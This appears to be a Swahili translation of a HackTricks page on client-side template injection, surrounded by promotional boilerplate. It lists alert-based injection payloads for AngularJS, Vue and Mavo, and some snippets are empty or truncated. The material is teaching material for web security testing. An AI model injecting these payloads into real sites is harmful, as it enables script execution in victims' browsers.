Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa nahtARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
# Muhtasari
Ni kama [**Uvujaji wa Kiolesura cha Upande wa Seva**](ssti-server-side-template-injection/) lakini kwenye **mteja**. **SSTI** inaweza kuruhusu wewe **kutekeleza nambari** kwenye seva ya mbali, **CSTI** inaweza kuruhusu wewe **kutekeleza nambari ya JavaScript** isiyo na kikomo kwenye kivinjari cha muathiriwa.
**Kujaribu** kwa udhaifu huu ni sawa na katika kesi ya **SSTI**, mkalimani anatarajia **kiolesura** na kuitekeleza. Kwa mfano, na mzigo kama `{{ 7-7 }}`, ikiwa programu ni **dhaifu** utaona `0`, na kama sivyo, utaona asili: `{{ 7-7 }}`
# AngularJS
AngularJS ni mfumo maarufu wa JavaScript unaoshirikiana na HTML kupitia sifa inayoitwa miongozo, moja inayojulikana ni **`ng-app`**. Miongozo hii inaruhusu AngularJS kusindika yaliyomo ya HTML, ikiruhusu utekelezaji wa maelezo ya JavaScript ndani ya mabano mara mbili.
Katika hali ambapo mwingiliano wa mtumiaji unawekwa kwa dinamiki ndani ya mwili wa HTML ulioandikwa na `ng-app`, inawezekana kutekeleza nambari isiyo na kikomo ya JavaScript. Hii inaweza kufanikishwa kwa kutumia muundo wa AngularJS ndani ya mwingiliano. Hapa chini ni mifano inayoonyesha jinsi nambari ya JavaScript inavyoweza kutekelezwa:
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
```
Unaweza kupata mfano wa msingi sana wa udhaifu katika **AngularJS** katika [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) na katika **[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)**
{% hint style="danger" %}
[**Angular 1.6 iliondoa sanduku la mchanga**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) hivyo kutoka kwenye toleo hili, mzigo kama `{{constructor.constructor('alert(1)')()}}` au `` inapaswa kufanya kazi.
{% endhint %}
# VueJS
Unaweza kupata utekelezaji wa **Vue ulio na udhaifu** katika [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
Mzigo unaofanya kazi: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
Na **msimbo wa chanzo** wa mfano ulio na udhaifu unapatikana hapa: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
```markup
">
aaa
```
## **V3**
Machapisho mazuri sana kuhusu CSTI katika VUE yanaweza kupatikana katika [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
```
{{_openBlock.constructor('alert(1)')()}}
```
Mikopo: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
## **V2**
```
{{constructor.constructor('alert(1)')()}}
```
Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
**Angalia mizigo zaidi ya VUE katika** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)
# Mavo
Payload:
```
[7*7]
[(1,alert)(1)]
{{top.alert(1)}}
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
test
lolxself.alert('lol')lolx
test
[self.alert(1)mod1]
```
**Payloads zaidi katika** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)
# **Orodha ya Uchunguzi wa Kuvunja-Nguvu**
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa nahtARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.